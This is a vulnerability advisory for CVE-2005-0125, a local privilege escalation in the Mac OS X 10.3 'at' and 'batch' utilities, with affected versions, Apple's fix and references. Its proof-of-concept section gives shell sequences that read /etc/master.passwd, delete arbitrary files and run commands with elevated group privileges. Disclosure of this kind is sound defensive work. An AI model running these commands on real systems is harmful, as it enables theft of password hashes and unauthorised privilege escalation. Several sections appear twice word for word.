Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
BID:12297
Info
Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
| Bugtraq ID: | 12297 |
| Class: | Access Validation Error |
| CVE: |
CVE-2005-0125 |
| Remote: | No |
| Local: | Yes |
| Published: | Jan 18 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | Discovery of this issue is credited to Immunity Inc. Discovery of the 'batch' command issue is credited to KF <[email protected]>. |
| Vulnerable: |
Apple Mac OS X Server 10.3.7 Apple Mac OS X Server 10.3.6 Apple Mac OS X Server 10.3.5 Apple Mac OS X Server 10.3.4 Apple Mac OS X Server 10.3.3 Apple Mac OS X Server 10.3.2 Apple Mac OS X Server 10.3.1 Apple Mac OS X Server 10.3 Apple Mac OS X 10.3.7 Apple Mac OS X 10.3.6 Apple Mac OS X 10.3.5 Apple Mac OS X 10.3.4 Apple Mac OS X 10.3.3 Apple Mac OS X 10.3.2 Apple Mac OS X 10.3.1 Apple Mac OS X 10.3 |
| Not Vulnerable: |
Apple Mac OS X Server 10.3.8 Apple Mac OS X 10.3.8 |
Discussion
Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
Multiple privilege escalation issues affect the 'at' family of utilities on Apple Mac OS X. These issues are due to a failure of the application to properly implement access controls on job schedule files.
An attacker may leverage these issues to read and delete arbitrary files and execute applications on an affected computer with superuser privileges. Information revealed in this way may lead to further attacks.
Multiple privilege escalation issues affect the 'at' family of utilities on Apple Mac OS X. These issues are due to a failure of the application to properly implement access controls on job schedule files.
An attacker may leverage these issues to read and delete arbitrary files and execute applications on an affected computer with superuser privileges. Information revealed in this way may lead to further attacks.
Exploit / POC
Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
No exploit is required to leverage these issues. The following proof of concept has been provided to view the master.passwd file:
tcsh% at Â-f /etc/master.passwd 12:44
Job a01194a36.001 will be executed using /bin/sh
tcsh% cat /var/at/jobs/a01194a36.001
tcsh% atrm a01194a36.001
The following proof of concept has been provided to remove arbitrary files from the affected computer:
tcsh% atrm fileName
Finally the following sequence will allow for the execution of the 'id' command with escalated privileges:
tcsh% echo > aa
/usr/bin/id > /tmp/test
tcsh% batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
tcsh% cat /tmp/test
cat: /tmp/test: No such file or directory
(wait for the scheduled job to run)
tcsh% cat /tmp/test
uid=500(username) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)
No exploit is required to leverage these issues. The following proof of concept has been provided to view the master.passwd file:
tcsh% at Â-f /etc/master.passwd 12:44
Job a01194a36.001 will be executed using /bin/sh
tcsh% cat /var/at/jobs/a01194a36.001
tcsh% atrm a01194a36.001
The following proof of concept has been provided to remove arbitrary files from the affected computer:
tcsh% atrm fileName
Finally the following sequence will allow for the execution of the 'id' command with escalated privileges:
tcsh% echo > aa
/usr/bin/id > /tmp/test
tcsh% batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
tcsh% cat /tmp/test
cat: /tmp/test: No such file or directory
(wait for the scheduled job to run)
tcsh% cat /tmp/test
uid=500(username) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)
Solution / Fix
Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
Solution:
Apple Computers has released advisory APPLE-SA-2005-01-25 along with a security update dealing with this and other issues. Please see the referenced advisory for more information.
Apple Computers has released Mac OS X version 10.3.8 dealing with this issue. This upgrade includes the security patches shipped with the referenced security update.
Apple Mac OS X Server 10.3.7
Apple Mac OS X 10.3.7
Solution:
Apple Computers has released advisory APPLE-SA-2005-01-25 along with a security update dealing with this and other issues. Please see the referenced advisory for more information.
Apple Computers has released Mac OS X version 10.3.8 dealing with this issue. This upgrade includes the security patches shipped with the referenced security update.
Apple Mac OS X Server 10.3.7
-
Apple Security Update 2005-001 (Mac OS X 10.3.7 Server) 1.0
http://www.apple.com/support/downloads/securityupdate2005001macosx1037 server.html -
Apple Mac OS X 10.3.8 upgrade
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=05368&plat form=osx&method=sa/MacOSXUpdate10.3.8.dmg
Apple Mac OS X 10.3.7
-
Apple Security Update 2005-001 (Mac OS X 10.3.7 Client) 1.0
http://www.apple.com/support/downloads/securityupdate2005001macosx1037 client.html -
Apple Mac OS X 10.3.8 upgrade
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=05368&plat form=osx&method=sa/MacOSXUpdate10.3.8.dmg
References
Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
References:
References:
- Mac OS X Homepage (Apple)
- Various Kernel Level Vulnerabilities in Mac OS X 10.3.x (Immunity Inc.)
- DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid' ("KF \(Lists\)"